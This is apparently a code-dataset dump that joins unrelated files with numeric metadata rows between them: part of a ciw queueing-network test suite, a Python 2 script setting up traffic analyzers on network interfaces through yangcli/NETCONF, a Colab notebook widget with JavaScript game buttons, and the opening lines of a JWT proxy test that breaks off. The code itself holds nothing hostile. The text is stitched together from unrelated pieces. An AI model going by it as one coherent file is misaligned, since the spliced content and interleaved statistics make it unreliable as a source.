self.assertEqual(N.service_centres[0].schedule, None)
self.assertEqual(N.service_centres[1].schedule, None)
self.assertEqual(N.service_centres[2].schedule, None)
self.assertEqual(N.service_centres[3].schedule, None)
self.assertFalse(N.service_centres[0].preempt)
self.assertFalse(N.service_centres[1].preempt)
self.assertFalse(N.service_centres[2].preempt)
self.assertFalse(N.service_centres[3].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0], ['Exponential', 7.0], ['Exponential', 4.0], ['Exponential', 1.0]])
self.assertEqual(N.customer_classes[1].arrival_distributions, [['Exponential', 2.0], ['Exponential', 3.0], ['Exponential', 6.0], ['Exponential', 4.0]])
self.assertEqual(N.customer_classes[2].arrival_distributions, [['Exponential', 2.0], ['Exponential', 1.0], ['Exponential', 2.0], ['Exponential', 0.5]])
self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0], ['Exponential', 7.0], ['Gamma', 0.4, 0.6], ['Deterministic', 0.5]])
self.assertEqual(N.customer_classes[1].service_distributions, [['Exponential', 7.0], ['Triangular', 0.1, 0.85, 0.8], ['Exponential', 8.0], ['Exponential', 5.0]])
self.assertEqual(N.customer_classes[2].service_distributions, [['Deterministic', 0.3], ['Deterministic', 0.2], ['Exponential', 8.0], ['Exponential', 9.0]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.1, 0.2, 0.1, 0.4], [0.2, 0.2, 0.0, 0.1], [0.0, 0.8, 0.1, 0.1], [0.4, 0.1, 0.1, 0.0]])
self.assertEqual(N.customer_classes[1].transition_matrix, [[0.6, 0.0, 0.0, 0.2], [0.1, 0.1, 0.2, 0.2], [0.9, 0.0, 0.0, 0.0], [0.2, 0.1, 0.1, 0.1]])
self.assertEqual(N.customer_classes[2].transition_matrix, [[0.0, 0.0, 0.4, 0.3], [0.1, 0.1, 0.1, 0.1], [0.1, 0.3, 0.2, 0.2], [0.0, 0.0, 0.0, 0.3]])
def test_raising_errors(self):
params = {'Arrival_distributions': {'Class 0':[['Exponential', 3.0]]},
'Service_distributions': {'Class 0':[['Exponential', 7.0]]},
'Number_of_servers': [9],
'Number_of_classes': 1,
'Transition_matrices': {'Class 0': [[0.5]]},
'Number_of_nodes': 1,
'Queue_capacities': ['Inf'],
'Detect_deadlock': False}
params_list = [copy.deepcopy(params) for i in range(23)]
params_list[0]['Number_of_classes'] = -2
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[0])
params_list[1]['Number_of_nodes'] = -2
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[1])
params_list[2]['Number_of_servers'] = [5, 6, 7]
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[2])
params_list[3]['Number_of_servers'] = [-3]
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[3])
params_list[4]['Number_of_servers'] = ['my_missing_schedule']
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[4])
params_list[5]['Queue_capacities'] = ['Inf', 1, 2]
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[5])
params_list[6]['Queue_capacities'] = [-2]
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[6])
params_list[7]['Arrival_distributions'] = {'Class 0':[['Exponential', 3.2]],
'Class 1':[['Exponential', 2.1]]}
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[7])
params_list[8]['Arrival_distributions'] = {'Patient 0':[['Exponential', 11.5]]}
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[8])
params_list[9]['Arrival_distributions']['Class 0'] = [['Exponential', 3.1],
['Exponential', 2.4]]
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[9])
params_list[10]['Service_distributions'] = {'Class 0':[['Exponential', 3.2]],
'Class 1':[['Exponential', 2.1]]}
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[10])
params_list[11]['Service_distributions'] = {'Patient 0':[['Exponential', 11.5]]}
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[11])
params_list[12]['Service_distributions']['Class 0'] = [['Exponential', 3.1],
['Exponential', 2.4]]
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[12])
params_list[13]['Transition_matrices'] = {'Class 0':[[0.2]],
'Class 1':[[0.3]]}
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[13])
params_list[14]['Transition_matrices'] = {'Patient 0':[[0.5]]}
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[14])
params_list[15]['Transition_matrices']['Class 0'] = [[0.2], [0.1]]
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[15])
params_list[16]['Transition_matrices']['Class 0'] = [[0.2, 0.1]]
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[16])
params_list[17]['Transition_matrices']['Class 0'] = [[-0.6]]
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[17])
params_list[18]['Transition_matrices']['Class 0'] = [[1.4]]
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[18])
params_list[19]['Class_change_matrices'] = {'Node 1':[[0.0]],
'Node 2':[[0.0]]}
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[19])
params_list[20]['Class_change_matrices'] = {'Patient 0':[[0.0]]}
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[20])
params_list[21]['Class_change_matrices'] = {'Node 1':[[-0.4]]}
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[21])
params_list[22]['Class_change_matrices'] = {'Node 1':[[1.5]]}
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[22])
class TestImportNoMatrix(unittest.TestCase):
def test_optional_transition_matrix(self):
params = {'Arrival_distributions': [['Exponential', 1.0]],
'Service_distributions': [['Exponential', 2.0]],
'Number_of_servers': [1]}
N = ciw.create_network(**params)
self.assertEqual([c.transition_matrix for c in N.customer_classes], [[[0.0]]])
N = ciw.create_network(
Arrival_distributions={'Class 0': [['Exponential', 1.0]],
'Class 1': [['Exponential', 1.0]]},
Service_distributions={'Class 0': [['Exponential', 2.0]],
'Class 1': [['Exponential', 1.0]]},
Number_of_servers=[1]
)
self.assertEqual([c.transition_matrix for c in N.customer_classes], [[[0.0]], [[0.0]]])
params = {'Arrival_distributions': [['Exponential', 1.0], ['Exponential', 1.0]],
'Service_distributions': [['Exponential', 2.0], ['Exponential', 2.0]],
'Number_of_servers': [1, 2]}
self.assertRaises(ValueError, ciw.create_network_from_dictionary, params)
class TestCreateNetworkKwargs(unittest.TestCase):
def test_network_from_kwargs(self):
N = ciw.create_network(
Arrival_distributions={'Class 0': [['Exponential', 3.0]]},
Service_distributions={'Class 0': [['Exponential', 7.0]]},
Number_of_servers=[9],
Transition_matrices={'Class 0': [[0.5]]},
Queue_capacities=['Inf']
)
self.assertEqual(N.number_of_nodes, 1)
self.assertEqual(N.number_of_classes, 1)
self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[0].number_of_servers, 9)
self.assertEqual(N.service_centres[0].class_change_matrix, None)
self.assertEqual(N.service_centres[0].schedule, None)
self.assertFalse(N.service_centres[0].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0]])
self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5]])
self.assertEqual(N.number_of_priority_classes, 1)
self.assertEqual(N.priority_class_mapping, {0:0})
N = ciw.create_network(
Arrival_distributions=[['Exponential', 3.0],
['Uniform', 0.2, 0.6]],
Service_distributions=[['Exponential', 7.0],
['Deterministic', 0.7]],
Number_of_servers=[[[1, 20], [4, 50]], 3],
Transition_matrices=[[0.5, 0.2],
[0.0, 0.0]],
Queue_capacities=[10, 'Inf']
)
self.assertEqual(N.number_of_nodes, 2)
self.assertEqual(N.number_of_classes, 1)
self.assertEqual(N.service_centres[0].queueing_capacity, 10)
self.assertEqual(N.service_centres[0].number_of_servers, 'schedule')
self.assertEqual(N.service_centres[0].class_change_matrix, None)
self.assertEqual(N.service_centres[0].schedule, [[1, 20], [4, 50]])
self.assertFalse(N.service_centres[0].preempt)
self.assertEqual(N.service_centres[1].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[1].number_of_servers, 3)
self.assertEqual(N.service_centres[1].class_change_matrix, None)
self.assertEqual(N.service_centres[1].schedule, None)
self.assertFalse(N.service_centres[1].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0], ['Uniform', 0.2, 0.6]])
self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0], ['Deterministic', 0.7]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5, 0.2], [0.0, 0.0]])
self.assertEqual(N.number_of_priority_classes, 1)
self.assertEqual(N.priority_class_mapping, {0:0})
N = ciw.create_network(
Arrival_distributions={'Class 0': [['Exponential', 3.0]],
'Class 1': [['Exponential', 4.0]]},
Service_distributions={'Class 0': [['Exponential', 7.0]],
'Class 1': [['Uniform', 0.4, 1.2]]},
Number_of_servers=[9],
Transition_matrices={'Class 0': [[0.5]],
'Class 1': [[0.0]]},
Queue_capacities=['Inf'],
Class_change_matrices={'Node 1': [[0.0, 1.0],
[0.2, 0.8]]}
)
self.assertEqual(N.number_of_nodes, 1)
self.assertEqual(N.number_of_classes, 2)
self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[0].number_of_servers, 9)
self.assertEqual(N.service_centres[0].class_change_matrix, [[0.0, 1.0], [0.2, 0.8]])
self.assertEqual(N.service_centres[0].schedule, None)
self.assertFalse(N.service_centres[0].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0]])
self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5]])
self.assertEqual(N.customer_classes[1].arrival_distributions, [['Exponential', 4.0]])
self.assertEqual(N.customer_classes[1].service_distributions, [['Uniform', 0.4, 1.2]])
self.assertEqual(N.customer_classes[1].transition_matrix, [[0.0]])
self.assertEqual(N.number_of_priority_classes, 1)
self.assertEqual(N.priority_class_mapping, {0:0, 1:0})
N = ciw.create_network(
Arrival_distributions={'Class 0': [['Exponential', 3.0]],
'Class 1': [['Exponential', 4.0]]},
Service_distributions={'Class 0': [['Exponential', 7.0]],
'Class 1': [['Uniform', 0.4, 1.2]]},
Number_of_servers=[9],
Transition_matrices={'Class 0': [[0.5]],
'Class 1': [[0.0]]},
Queue_capacities=['Inf'],
Priority_classes={'Class 0': 1,
'Class 1': 0}
)
self.assertEqual(N.number_of_nodes, 1)
self.assertEqual(N.number_of_classes, 2)
self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[0].number_of_servers, 9)
self.assertEqual(N.service_centres[0].schedule, None)
self.assertFalse(N.service_centres[0].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0]])
self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5]])
self.assertEqual(N.customer_classes[1].arrival_distributions, [['Exponential', 4.0]])
self.assertEqual(N.customer_classes[1].service_distributions, [['Uniform', 0.4, 1.2]])
self.assertEqual(N.customer_classes[1].transition_matrix, [[0.0]])
self.assertEqual(N.customer_classes[0].priority_class, 1)
self.assertEqual(N.customer_classes[1].priority_class, 0)
self.assertEqual(N.number_of_priority_classes, 2)
self.assertEqual(N.priority_class_mapping, {0:1, 1:0})
N = ciw.create_network(
Arrival_distributions=[['Exponential', 3.0],
['Exponential', 4.0],
['Exponential', 2.0]],
Service_distributions=[['Exponential', 7.0],
['Uniform', 0.4, 1.2],
['Deterministic', 5.33]],
Number_of_servers=[9, 2, 4],
Transition_matrices=[[0.5, 0.0, 0.1],
[0.2, 0.1, 0.0],
[0.0, 0.0, 0.0]],
Queue_capacities=['Inf', 'Inf', 'Inf'],
Baulking_functions=[None, None, example_baulking_function]
)
self.assertEqual(N.number_of_nodes, 3)
self.assertEqual(N.number_of_classes, 1)
self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[0].number_of_servers, 9)
self.assertEqual(N.service_centres[0].schedule, None)
self.assertFalse(N.service_centres[0].preempt)
self.assertEqual(N.service_centres[1].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[1].number_of_servers, 2)
self.assertEqual(N.service_centres[1].schedule, None)
self.assertFalse(N.service_centres[1].preempt)
self.assertEqual(N.service_centres[2].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[2].number_of_servers, 4)
self.assertEqual(N.service_centres[2].schedule, None)
self.assertFalse(N.service_centres[2].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0], ['Exponential', 4.0], ['Exponential', 2.0]])
self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0], ['Uniform', 0.4, 1.2], ['Deterministic', 5.33]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5, 0.0, 0.1],
[0.2, 0.1, 0.0],
[0.0, 0.0, 0.0]])
self.assertEqual(N.customer_classes[0].baulking_functions, [None, None, example_baulking_function])
self.assertEqual(N.number_of_priority_classes, 1)
def test_error_no_arrivals_servers_services(self):
with self.assertRaises(ValueError):
ciw.create_network()
with self.assertRaises(ValueError):
ciw.create_network(Arrival_distributions=[['Exponential', 0.2]])
with self.assertRaises(ValueError):
ciw.create_network(Service_distributions=[['Exponential', 0.2]])
with self.assertRaises(ValueError):
ciw.create_network(Number_of_servers=[1])
with self.assertRaises(ValueError):
ciw.create_network(Arrival_distributions=[['Exponential', 0.2]], Number_of_servers=[1])
with self.assertRaises(ValueError):
ciw.create_network(Arrival_distributions=[['Exponential', 0.2]], Service_distributions=[['Exponential', 0.2]])
with self.assertRaises(ValueError):
ciw.create_network(Service_distributions=[['Exponential', 0.2]], Number_of_servers=[1])
def test_error_extra_args(self):
params = {'Arrival_distributions': [['Exponential', 3.0]],
'Service_distributions': [['Exponential', 7.0]],
'Number_of_servers': [4],
'Something_else': 56
}
with self.assertRaises(TypeError):
ciw.create_network(**params)
def test_raise_error_wrong_batch_dist(self):
params = {'Arrival_distributions': [['Exponential', 3.0]],
'Service_distributions': [['Exponential', 7.0]],
'Number_of_servers': [4],
'Batching_distributions': [['Exponential', 1.3]]
}
with self.assertRaises(ValueError):
ciw.create_network(**params)
| 59.498258
| 169
| 0.600726
| 4,011
| 34,152
| 4.897282
| 0.036899
| 0.151963
| 0.142544
| 0.085476
| 0.897113
| 0.87563
| 0.850328
| 0.828539
| 0.789492
| 0.764954
| 0
| 0.048274
| 0.254539
| 34,152
| 573
| 170
| 59.602094
| 0.723281
| 0.000849
| 0
| 0.597303
| 0
| 0
| 0.10621
| 0.020867
| 0
| 0
| 0
| 0
| 0.489403
| 1
| 0.025048
| false
| 0
| 0.013487
| 0
| 0.052023
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
95be8cced20fc7cc40282537331ac6ba733410fa
| 6,926
|
py
|
Python
|
setup-traffic-analyzers/session.testapi.py
|
vlvassilev/ecoc-demo-2018
|
3f813fdff3c2405561b32122bbe3c51c001ff81b
|
[
"BSD-3-Clause"
] | 1
|
2019-03-06T13:52:14.000Z
|
2019-03-06T13:52:14.000Z
|
setup-traffic-analyzers/session.testapi.py
|
vlvassilev/ecoc-demo-2018
|
3f813fdff3c2405561b32122bbe3c51c001ff81b
|
[
"BSD-3-Clause"
] | null | null | null |
setup-traffic-analyzers/session.testapi.py
|
vlvassilev/ecoc-demo-2018
|
3f813fdff3c2405561b32122bbe3c51c001ff81b
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python
import lxml
from lxml import etree
import time
import sys, os
import argparse
from collections import namedtuple
import tntapi
sys.path.append("../common")
import testsuiteapi
import yangrpc
from yangcli import yangcli
namespaces={"nc":"urn:ietf:params:xml:ns:netconf:base:1.0",
"nd":"urn:ietf:params:xml:ns:yang:ietf-network",
"if":"urn:ietf:params:xml:ns:yang:ietf-interfaces"}
def yangcli_ok_script(yconn, yangcli_script):
for line in yangcli_script.splitlines():
line=line.strip()
if not line:
continue
print("Executing: "+line)
result = yangcli(yconn, line)
ok=result.xpath('./ok')
if(len(ok)!=1):
print lxml.etree.tostring(result)
assert(0)
def step_1(network, conns, yconns, filter=filter):
#!
yangcli_script_clear='''
merge /interfaces/interface[name='ge0'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge1'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge2'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge3'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge4'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge5'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge6'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge7'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge8'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge9'] -- type='ethernetCsmacd'
remove /interfaces/interface[name='ge0']/traffic-analyzer
remove /interfaces/interface[name='ge1']/traffic-analyzer
remove /interfaces/interface[name='ge2']/traffic-analyzer
remove /interfaces/interface[name='ge3']/traffic-analyzer
remove /interfaces/interface[name='ge4']/traffic-analyzer
remove /interfaces/interface[name='ge5']/traffic-analyzer
remove /interfaces/interface[name='ge6']/traffic-analyzer
remove /interfaces/interface[name='ge7']/traffic-analyzer
remove /interfaces/interface[name='ge8']/traffic-analyzer
remove /interfaces/interface[name='ge9']/traffic-analyzer
commit
'''
yangcli_script_local='''
merge /interfaces/interface[name='ge0'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge1'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge2'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge3'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge4'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge5'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge6'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge7'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge8'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge9'] -- type='ethernetCsmacd'
replace /interfaces/interface[name='ge0']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge1']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge2']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge3']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge4']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge5']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge6']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge7']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge8']/traffic-analyzer -- direction=egress
replace /interfaces/interface[name='ge9']/traffic-analyzer -- direction=egress
merge /interfaces/interface[name='ge0']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge1']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge2']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge3']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge4']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge5']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge6']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge7']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge8']/traffic-analyzer/filter -- type=ethernet ether-type=1234
merge /interfaces/interface[name='ge9']/traffic-analyzer/filter -- type=ethernet ether-type=1234
'''
yangcli_script_middle='''
merge /interfaces/interface[name='ge0'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge1'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge2'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge3'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge4'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge5'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge6'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge7'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge8'] -- type='ethernetCsmacd'
merge /interfaces/interface[name='ge9'] -- type='ethernetCsmacd'
replace /interfaces/interface[name='ge0']/traffic-analyzer
replace /interfaces/interface[name='ge1']/traffic-analyzer
replace /interfaces/interface[name='ge2']/traffic-analyzer
replace /interfaces/interface[name='ge3']/traffic-analyzer
replace /interfaces/interface[name='ge4']/traffic-analyzer
replace /interfaces/interface[name='ge5']/traffic-analyzer
replace /interfaces/interface[name='ge6']/traffic-analyzer
replace /interfaces/interface[name='ge7']/traffic-analyzer
replace /interfaces/interface[name='ge8']/traffic-analyzer
replace /interfaces/interface[name='ge9']/traffic-analyzer
'''
yangcli_ok_script(yconns["local"], yangcli_script_clear)
yangcli_ok_script(yconns["middle"], yangcli_script_clear)
tntapi.network_commit(conns)
yangcli_ok_script(yconns["local"], yangcli_script_local)
yangcli_ok_script(yconns["middle"], yangcli_script_middle)
tntapi.network_commit(conns)
def main():
print("""
#Description: Stat traffic analyzers
#Procedure:
#1 - Start traffic analyzers on the local and middle h100 ge0-9 interfaces.
""")
parser = argparse.ArgumentParser()
parser.add_argument("--config", help="Path to the netconf configuration *.xml file defining the configuration according to ietf-networks, ietf-networks-topology and netconf-node models e.g. ../networks.xml")
args = parser.parse_args()
tree=etree.parse(args.config)
network = tree.xpath('/nc:config/nd:networks/nd:network', namespaces=namespaces)[0]
conns = tntapi.network_connect(network)
yconns = tntapi.network_connect_yangrpc(network)
mylinks = tntapi.parse_network_links(network)
filter = testsuiteapi.get_filter()
print("#Running ...")
print("#1 - Start traffic analyzers on the local and middle h100 ge0-9 interfaces.")
step_1(network, conns, yconns, filter=filter)
sys.exit(main())
| 45.86755
| 208
| 0.773318
| 855
| 6,926
| 6.219883
| 0.14386
| 0.250094
| 0.302745
| 0.210605
| 0.792591
| 0.788266
| 0.691049
| 0.549267
| 0.441895
| 0.441895
| 0
| 0.020012
| 0.069304
| 6,926
| 150
| 209
| 46.173333
| 0.804995
| 0.002455
| 0
| 0.273438
| 0
| 0.085938
| 0.794556
| 0.559867
| 0
| 0
| 0
| 0
| 0.007813
| 0
| null | null | 0
| 0.078125
| null | null | 0.039063
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
95d774d1708967b5e67791b7f15f139a00511e3a
| 6,091
|
py
|
Python
|
src/widgets.py
|
NishiyamatoGakuenSSHTA/nygssh-journey
|
dc8ceb7c4d33dda5d57439d8db4250d384161f83
|
[
"MIT"
] | null | null | null |
src/widgets.py
|
NishiyamatoGakuenSSHTA/nygssh-journey
|
dc8ceb7c4d33dda5d57439d8db4250d384161f83
|
[
"MIT"
] | null | null | null |
src/widgets.py
|
NishiyamatoGakuenSSHTA/nygssh-journey
|
dc8ceb7c4d33dda5d57439d8db4250d384161f83
|
[
"MIT"
] | null | null | null |
import IPython
from IPython.display import HTML
def GameDisplay():
return IPython.display.HTML('''
<button id='left-btn'>←</button>
<button id='right-btn'>→</button>
<button id='up-btn'>↑</button>
<button id='down-btn'>↓</button>
<button id='a-btn'>A</button>
<button id='b-btn'>B</button>
<div style="height: 3px"></div>
<script>
const div = document.createElement('div');
document.body.appendChild(div);
const dst_canvas = document.createElement('canvas');
dst_canvas.width = "720";
dst_canvas.height = "400";
const dst_canvasCtx = dst_canvas.getContext('2d');
div.appendChild(dst_canvas);
document.querySelector('#left-btn').onclick = () => {
var send_num = 0
_canvasUpdate();
async function _canvasUpdate() {
if(send_num < 1){
send_num += 1;
const results = google.colab.kernel.invokeFunction('notebook.updatadisplay', ["left"], {});
results.then(function(value) {
parse = JSON.parse(JSON.stringify(value))["data"];
parse = JSON.parse(JSON.stringify(parse))["application/json"];
parse = JSON.parse(JSON.stringify(parse))["img_str"];
var image = new Image();
image.src = parse;
image.onload = function(){dst_canvasCtx.drawImage(image, 0, 0)};
send_num -= 1;
})
requestAnimationFrame(_canvasUpdate);
}
}
};
document.querySelector('#right-btn').onclick = () => {
var send_num = 0
_canvasUpdate();
async function _canvasUpdate() {
if(send_num < 1){
send_num += 1;
const results = google.colab.kernel.invokeFunction('notebook.updatadisplay', ["right"], {});
results.then(function(value) {
parse = JSON.parse(JSON.stringify(value))["data"];
parse = JSON.parse(JSON.stringify(parse))["application/json"];
parse = JSON.parse(JSON.stringify(parse))["img_str"];
var image = new Image();
image.src = parse;
image.onload = function(){dst_canvasCtx.drawImage(image, 0, 0)};
send_num -= 1;
})
requestAnimationFrame(_canvasUpdate);
}
}
};
document.querySelector('#up-btn').onclick = () => {
var send_num = 0
_canvasUpdate();
async function _canvasUpdate() {
if(send_num < 1){
send_num += 1;
const results = google.colab.kernel.invokeFunction('notebook.updatadisplay', ["up"], {});
results.then(function(value) {
parse = JSON.parse(JSON.stringify(value))["data"];
parse = JSON.parse(JSON.stringify(parse))["application/json"];
parse = JSON.parse(JSON.stringify(parse))["img_str"];
var image = new Image();
image.src = parse;
image.onload = function(){dst_canvasCtx.drawImage(image, 0, 0)};
send_num -= 1;
})
requestAnimationFrame(_canvasUpdate);
}
}
};
document.querySelector('#down-btn').onclick = () => {
var send_num = 0
_canvasUpdate();
async function _canvasUpdate() {
if(send_num < 1){
send_num += 1;
const results = google.colab.kernel.invokeFunction('notebook.updatadisplay', ["down"], {});
results.then(function(value) {
parse = JSON.parse(JSON.stringify(value))["data"];
parse = JSON.parse(JSON.stringify(parse))["application/json"];
parse = JSON.parse(JSON.stringify(parse))["img_str"];
var image = new Image();
image.src = parse;
image.onload = function(){dst_canvasCtx.drawImage(image, 0, 0)};
send_num -= 1;
})
requestAnimationFrame(_canvasUpdate);
}
}
};
document.querySelector('#a-btn').onclick = () => {
var send_num = 0
_canvasUpdate();
async function _canvasUpdate() {
if(send_num < 1){
send_num += 1;
const results = google.colab.kernel.invokeFunction('notebook.updatadisplay', ["A"], {});
results.then(function(value) {
parse = JSON.parse(JSON.stringify(value))["data"];
parse = JSON.parse(JSON.stringify(parse))["application/json"];
parse = JSON.parse(JSON.stringify(parse))["img_str"];
var image = new Image();
image.src = parse;
image.onload = function(){dst_canvasCtx.drawImage(image, 0, 0)};
send_num -= 1;
})
requestAnimationFrame(_canvasUpdate);
}
}
};
document.querySelector('#b-btn').onclick = () => {
var send_num = 0
_canvasUpdate();
async function _canvasUpdate() {
if(send_num < 1){
send_num += 1;
const results = google.colab.kernel.invokeFunction('notebook.updatadisplay', ["B"], {});
results.then(function(value) {
parse = JSON.parse(JSON.stringify(value))["data"];
parse = JSON.parse(JSON.stringify(parse))["application/json"];
parse = JSON.parse(JSON.stringify(parse))["img_str"];
var image = new Image();
image.src = parse;
image.onload = function(){dst_canvasCtx.drawImage(image, 0, 0)};
send_num -= 1;
})
requestAnimationFrame(_canvasUpdate);
}
}
};
</script>
''')
| 40.606667
| 108
| 0.502216
| 552
| 6,091
| 5.440217
| 0.130435
| 0.107892
| 0.103896
| 0.107892
| 0.838162
| 0.838162
| 0.838162
| 0.838162
| 0.838162
| 0.838162
| 0
| 0.011285
| 0.359875
| 6,091
| 149
| 109
| 40.879195
| 0.757887
| 0
| 0
| 0.680851
| 0
| 0
| 0.982105
| 0.39074
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007092
| true
| 0
| 0.014184
| 0.007092
| 0.028369
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
253d3563f7a67ee1dd62420f9f9d214b2135ec76
| 2,382
|
py
|
Python
|
tests/test_jwt_proxy.py
|
SOFIE-project/Identity-Authentication-Authorization
|
4651fdce9249511dda4ac3591235d0670deafc9b
|
[
"Apache-1.1"
] | 2
|
2020-03-12T14:55:42.000Z
|
2020-10-16T02:54:41.000Z
|
tests/test_jwt_proxy.py
|
SOFIE-project/Identity-Authentication-Authorization
|
4651fdce9249511dda4ac3591235d0670deafc9b
|
[
"Apache-1.1"
] | 1
|
2020-08-12T19:31:33.000Z
|
2020-08-12T19:31:33.000Z
|
tests/test_jwt_proxy.py
|
SOFIE-project/Identity-Authentication-Authorization
|
4651fdce9249511dda4ac3591235d0670deafc9b
|
[
"Apache-1.1"
] | 3
|
2020-03-16T15:26:31.000Z
|
2020-05-20T20:19:49.000Z
|
import pytest
import requests
import json
class TestJWT:
def test_valid_bearer_get(self):
